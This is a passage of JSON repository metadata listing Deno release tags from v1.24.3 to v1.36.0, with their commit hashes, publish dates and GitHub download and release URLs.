rl":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denolan